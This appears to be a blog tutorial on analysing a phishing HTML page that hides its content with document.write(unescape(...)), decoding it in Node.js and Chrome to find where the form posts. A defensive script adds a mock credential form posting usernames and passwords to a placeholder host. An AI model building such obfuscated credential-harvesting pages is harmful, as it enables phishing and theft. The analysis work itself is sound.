Let me kick this off by first telling you how much I love phishing emails. I LOVE them. I LOVE seeing 60 phishing emails fly straight through email filters. I LOVE having to inspect each one for the IOC. I LOVE having to dig through Bro logs to check to make sure that person didn't click the link. If this isn't true love, I don't know what is.
I actually don't love any of those things. In fact, most phishing that you'll see is extremely generic and very poorly done. It's almost as if no one knows that the Social Engineering Toolkit exists. Like, Dave Kennedy literally did all the work for them and they still choose to use awful screen cap JPEGs with some fields overlaying them, but I guess that's all beside the point. This XKCD pretty much hits the nail on the head.
The one, single good thing about these babies is that they're great to learn from because they're easy!
This file is available on VirusTotal, so download and follow along!
Figure 1: People actually fall for this. I mean seriously, look how bad this is.
So as an analyst, my main concern with this is really just the IOC. Basically - did the user click the link? Did the user enter their credentials? So, you may be thinking, "Yeah... so I opened Chrome DevTools, inspected the form and lo and behold I see the domain it posts to, namely:
Figure 2: Oh, lookie there! The form posts to that domain.
Awesome news! If we were just analyzing this quickly, we've got our IOC and we can make sure we had no network hits and move on with our merry lives. But how does this thing really work? Let's open this up in a text editor and see what we're working with.
Figure 3: Well, that's pretty nasty looking...
Going through the entire file, it looks like the only thing we really see is a single line of the form:
document.write(unescape('insert tons of hex here...'));
Let's take a look at what the unescape function actually does.
Figure 4: Ty for the documentation Microsoft.
So the script is using unescape to convert all of those hex encoded characters (%XX sequences) back to their ASCII character equivalents and then writing the result to the HTML document, thus building the phishing page that we saw earlier. Let's go ahead and prove this.
We're going to do this two different ways. These are not the only ways, but these are my preferred ways.
1. Node.js
First up is Node (remember, all we're really doing is unescaping). There's one slight modification to our file that we're going to make first: remove the document.write() call that is wrapping our unescape function. We do this because there is no DOM inside of Node, unlike in the Chrome browser, so document is not defined there.
Now that we've made our changes to our file contents, let's pop those contents into Node. (Go make yourself some coffee while you wait for it to paste. It's an incredible amount of characters...) Once it's finally finished pasting, go ahead and hit enter.
Figure 5: How easy was that? Yay Node!
Node prints the decoded string straight back to us. In the browser (with the original document.write() left in place), this same text would instead be written to the HTML document, which is what renders that ugly phishing page.
2. Google Chrome
Chrome makes it just as easy! Remember, we're doing the same thing (unescape('hexencodedchars')). Let's paste our modified script (with document.write() removed) into the Chrome console and take a look at the results!
Figure 6: Woot! Chrome rocks too!
Same exact results as Node.js. You can even argue it's a little better since it's formatted nicely for us!
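As an added example (not code from the original post), here is the same unescaping done as a small Node script that never calls document.write, so the decoded page is never rendered; it pulls the form action (our IOC) and the harvested field names straight out of the decoded text. The phishing file it parses is constructed inline; PAGE_HTML, hexEscape, decodeEscaped, decodePage and extractIocs are names made up for this example.

```javascript
// Emulate how the kit encodes the page: every character becomes %XX
// (or %uXXXX for anything beyond one byte). Used only to build the fixture.
function hexEscape(s) {
  return Array.from(s, ch => {
    const hex = ch.charCodeAt(0).toString(16).toUpperCase();
    return hex.length > 2 ? '%u' + hex.padStart(4, '0') : '%' + hex.padStart(2, '0');
  }).join('');
}

// CONSTRUCTED sample: a fake credential form wrapped exactly the way the post
// describes, document.write(unescape('...')). example.invalid is a placeholder.
const PAGE_HTML = '<form action="http://example.invalid/login.php" method="post">'
  + '<input name="user"><input name="pass" type="password"></form>';
const SAMPLE_FILE = "<html><body><script>document.write(unescape('"
  + hexEscape(PAGE_HTML) + "'));</script></body></html>";

// What unescape() does, reimplemented so nothing from the file is executed:
// %uXXXX -> UTF-16 code unit, %XX -> byte, malformed sequences left as-is.
function decodeEscaped(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Find every unescape('...') argument in the file text and decode it.
function decodePage(fileText) {
  const re = /unescape\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  const out = [];
  let m;
  while ((m = re.exec(fileText)) !== null) out.push(decodeEscaped(m[2]));
  return out;
}

// The IOCs an analyst wants: where the form posts and which fields it collects.
function extractIocs(fileText) {
  const html = decodePage(fileText).join('\n');
  const actions = [...html.matchAll(/<form\b[^>]*\baction\s*=\s*["']([^"']+)["']/gi)].map(m => m[1]);
  const fields = [...html.matchAll(/<input\b[^>]*\bname\s*=\s*["']([^"']+)["']/gi)].map(m => m[1]);
  return { actions, fields };
}

console.log(JSON.stringify(extractIocs(SAMPLE_FILE), null, 2));
```

To run it against a real sample, read the downloaded .html file with fs.readFileSync and pass its contents to extractIocs instead of SAMPLE_FILE.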
Well, I promised an easy one to start with and we got it! Poke around in Node and in the Chrome DevTools and really get acquainted with them. These are going to be the two most important tools we'll be using in this series. (Hint: I use Chrome DevTools EXTENSIVELY!!!) See if you can't find a few more phishing documents and try this same process until you feel comfortable!
I hope you enjoyed the first entry in this series! If you have any questions or comments, feel free to comment below!